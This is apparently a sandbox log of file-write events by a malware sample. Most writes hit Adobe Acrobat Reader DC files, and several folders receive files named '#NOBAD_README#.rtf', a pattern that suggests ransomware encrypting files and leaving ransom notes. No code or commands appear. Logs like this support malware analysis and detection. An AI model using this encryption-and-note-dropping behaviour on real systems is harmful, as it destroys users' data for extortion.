| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css | size = 2643 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js | size = 2600 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js | size = 2585 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js | size = 2632 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag_retina.png | size = 3565 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png | size = 3565 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Checkmark_White@1x.png | size = 1822 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Checkmark_White@1x.png | size = 1822 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png | size = 1712 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check_2x.png | size = 2914 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif | size = 2610 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif | size = 1994 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#NOBAD_README#.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#NOBAD_README#.rtf | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif | size = 2378 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main-selector.css | size = 2610 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js | size = 3205 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif | size = 2577 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js | size = 9047 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\ui-strings.js | size = 2661 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js | size = 2734 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\ui-strings.js | size = 2684 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons2x.png | size = 2601 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\ui-strings.js | size = 2239 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js | size = 2720 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\ui-strings.js | size = 2698 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js | size = 4985 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png | size = 3538 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons.png | size = 2099 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png | size = 2601 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\ui-strings.js | size = 2567 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js | size = 2623 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js | size = 2567 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js | size = 2598 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\ui-strings.js | size = 2600 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js | size = 2577 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png | size = 2645 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png | size = 2645 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_AddBlue@1x.png | size = 1786 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_AddBlue@1x.png | size = 1786 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur | size = 9014 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check.cur | size = 9014 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur | size = 9014 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png | size = 2914 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x_2x.png | size = 2416 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif | size = 2545 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png | size = 8086 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js | size = 2563 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\sample-thumb.png | size = 8086 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png | size = 3538 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png | size = 3436 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png | size = 1713 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png | size = 2974 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png | size = 1712 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif | size = 1473 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js | size = 5218 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\sample-thumb.png | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif | size = 1482 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugin.js | size = 2357 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js | size = 5269 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js | size = 5069 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js | size = 4926 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der | size = 2514 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif | size = 2029 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif | size = 2325 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif | size = 2331 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme | size = 8275 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugin.js | size = 1959 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif | size = 1479 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\generic-rhp-app-selector.js | size = 5921 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\require.min.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\require.min.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left.gif | size = 1479 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png | size = 6189 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png | size = 2071 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png | size = 1984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\ui-strings.js | size = 2348 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\ui-strings.js | size = 3222 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js | size = 3258 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js | size = 2347 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png | size = 9479 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js | size = 2631 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png | size = 1861 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png | size = 9479 |
|
